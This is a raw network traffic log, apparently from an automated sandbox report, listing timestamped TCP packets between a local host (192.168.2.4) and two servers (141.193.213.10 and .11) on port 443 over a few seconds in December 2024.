                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.478581905 CET44349836141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.478665113 CET44349836141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.478687048 CET49836443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.478708029 CET44349836141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.478760958 CET44349836141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.478801012 CET49836443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.478816032 CET44349836141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.478826046 CET44349837141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.478863001 CET49836443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.478877068 CET44349836141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.478888035 CET49837443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.478903055 CET44349837141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.486109972 CET44349840141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.486352921 CET49840443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.486381054 CET44349840141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.487503052 CET44349840141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.487775087 CET49840443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.487925053 CET49840443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.487970114 CET44349840141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.488930941 CET44349841141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.489097118 CET49841443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.489140987 CET44349841141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.489396095 CET44349836141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.489465952 CET49836443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.489480972 CET44349836141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.489506960 CET44349836141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.489644051 CET49836443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.489660978 CET44349836141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.489830017 CET44349836141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.490151882 CET49836443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.490292072 CET44349841141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.490473032 CET49836443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.490494967 CET44349836141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.490812063 CET49848443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.490880966 CET44349848141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.491050959 CET49848443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.492245913 CET49848443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.492278099 CET44349848141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.492841005 CET44349842141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.492903948 CET49841443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.493104935 CET44349841141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.493240118 CET49841443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.493372917 CET49842443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.493388891 CET44349842141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.494802952 CET44349842141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.494868994 CET49842443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.496465921 CET49842443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.496537924 CET44349842141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.496678114 CET49842443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.496685028 CET44349842141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.523204088 CET49837443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.523224115 CET44349837141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.535361052 CET44349841141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.538353920 CET49842443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.538353920 CET49840443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.569467068 CET49837443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.590681076 CET44349837141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.591041088 CET44349837141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.591268063 CET49837443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.591510057 CET49837443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.591550112 CET44349837141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.591821909 CET49849443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.591856003 CET44349849141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.591963053 CET49849443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.592951059 CET49849443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.592978001 CET44349849141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.649985075 CET44349838141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.650119066 CET44349838141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.650181055 CET49838443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.650199890 CET44349838141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.650408983 CET44349838141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.650500059 CET49838443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.652240038 CET49838443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.652257919 CET44349838141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.652678967 CET49850443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.652761936 CET44349850141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.652847052 CET49850443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.653646946 CET49850443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.653682947 CET44349850141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.674170017 CET44349843141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.674488068 CET49843443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.674513102 CET44349843141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.677656889 CET44349843141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.677731037 CET49843443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.681057930 CET49843443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.681155920 CET44349843141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.681334972 CET49843443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.681353092 CET44349843141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.722631931 CET44349839141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.722749949 CET44349839141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.722847939 CET44349839141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.722887993 CET49839443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.722930908 CET44349839141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.723072052 CET44349839141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.723133087 CET49839443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.740791082 CET49843443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.774122000 CET49839443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.774163008 CET44349839141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.774658918 CET49851443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.774775982 CET44349851141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.774888039 CET49851443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.775697947 CET49851443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.775732994 CET44349851141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.896425009 CET44349844141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.900154114 CET44349845141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.909449100 CET49845443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.909482956 CET44349845141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.909569979 CET49844443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.909610033 CET44349844141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.913042068 CET44349845141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.913147926 CET49845443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.913175106 CET44349844141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.913252115 CET49844443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.919902086 CET49844443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.920090914 CET44349844141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.923065901 CET49845443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.923238993 CET49844443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.923248053 CET44349845141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.923264027 CET44349844141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.923286915 CET49845443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.963354111 CET44349845141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.965285063 CET49845443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.965291023 CET49844443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:55.965301037 CET44349845141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.011864901 CET49845443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.119302034 CET44349842141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.119429111 CET44349842141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.119477987 CET49842443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.119544029 CET44349841141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.119556904 CET44349840141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.119653940 CET44349840141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.119656086 CET44349841141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.119704008 CET44349843141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.119707108 CET49840443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.119718075 CET44349840141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.119724989 CET44349841141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.119754076 CET49841443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.119780064 CET44349840141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.119791031 CET44349841141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.119822979 CET44349843141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.119827032 CET49840443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.119834900 CET44349840141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.119839907 CET49841443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.119857073 CET44349841141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.119885921 CET44349843141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.119911909 CET49843443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.119915962 CET44349841141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.119927883 CET44349843141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.119932890 CET44349840141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.119983912 CET49840443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.119987965 CET49841443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.119992018 CET44349840141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.119999886 CET44349843141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.119999886 CET44349841141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.120028973 CET44349841141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.120028973 CET49843443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.120034933 CET44349840141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.120064020 CET44349843141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.120084047 CET49840443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.120091915 CET44349840141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.120090961 CET49841443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.120105982 CET44349841141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.120140076 CET49843443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.120152950 CET44349843141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.120152950 CET44349841141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.120201111 CET49841443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.120212078 CET44349841141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.120255947 CET44349840141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.120368958 CET44349841141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.120424986 CET49840443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.120424986 CET49841443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.122312069 CET49842443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.122324944 CET44349842141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.122761965 CET49852443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.122781038 CET44349852141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.122859955 CET49852443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.123316050 CET49852443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.123327017 CET44349852141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.123886108 CET49840443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.123908997 CET44349840141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.124111891 CET49853443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.124200106 CET44349853141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.124283075 CET49853443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.124753952 CET49853443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.124792099 CET44349853141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.125092983 CET49841443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.125122070 CET44349841141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.125355959 CET49854443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.125364065 CET44349854141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.125411987 CET49854443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.126131058 CET49854443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.126142979 CET44349854141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.127089024 CET44349843141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.127151012 CET49843443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.127170086 CET44349843141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.127302885 CET44349843141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.127355099 CET49843443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.128304958 CET49843443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.128319979 CET44349843141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.128560066 CET49855443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.128582001 CET44349855141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.128648996 CET49855443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.129205942 CET49855443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.129230022 CET44349855141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.452605009 CET44349845141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.452732086 CET44349845141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.452805996 CET49845443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.452822924 CET44349845141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.452852011 CET44349845141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.452905893 CET49845443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.452963114 CET44349845141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.496772051 CET49845443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.496799946 CET44349845141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.544049025 CET49845443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.674608946 CET44349845141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.674778938 CET44349845141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.674830914 CET44349844141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.674840927 CET44349845141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.674902916 CET49845443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.674926043 CET44349845141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.674940109 CET44349844141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.674993038 CET49845443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.675007105 CET44349845141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.675005913 CET44349844141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.675029039 CET49844443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.675088882 CET44349845141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.675100088 CET44349844141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.675147057 CET49845443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.675157070 CET44349844141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.675159931 CET44349845141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.675168991 CET49844443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.675187111 CET44349844141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.675216913 CET44349845141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.675270081 CET49844443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.675271988 CET49845443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.675283909 CET44349845141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.675285101 CET44349844141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.675388098 CET44349845141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.675453901 CET44349844141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.675477982 CET44349845141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.675533056 CET49844443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.675544977 CET49845443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.675559044 CET44349845141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.675640106 CET44349845141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.675657034 CET49845443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.675671101 CET44349845141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.675801039 CET49845443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.676861048 CET49844443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.676892042 CET44349844141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.677202940 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.677259922 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.677328110 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.678002119 CET49856443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.678035975 CET44349856141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.678350925 CET44349845141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.688250065 CET44349846141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.688484907 CET49846443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.688504934 CET44349846141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.689673901 CET44349846141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.690094948 CET49846443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.690228939 CET49846443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.690239906 CET44349846141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:56.690274000 CET44349846141.193.213.10192.168.2.4
